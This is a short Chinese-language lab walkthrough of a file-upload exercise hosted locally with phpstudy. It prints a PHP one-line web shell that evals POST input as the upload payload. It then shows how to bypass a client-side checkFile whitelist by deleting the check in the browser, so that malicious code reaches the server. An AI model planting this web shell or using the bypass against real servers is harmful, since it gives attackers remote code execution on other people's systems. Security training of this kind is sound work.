用phpstudy搭建的。搭建很简单,下载源码,放置在phpstudy的根目录下,在phpstudy中创建。
这里上传的文件内容是一句话木马:
<?php header("Constent-type:text/html:charset=1232"); echo "<pre>"; @eval($_POST['input']); ?>
上传一个php文件试一试。传不上的,使用的白名单过滤的。我们考虑一下是什么原因传不上去? 是被校验了,那我们查看一下哪里校验的,先看看前端代码。 检查了一下前端代码,发现了一个checkFile函数。把检查函数删除掉试一下。上传一下,成功上传。这样我们可以把恶意代码上传到服务器上,去攻击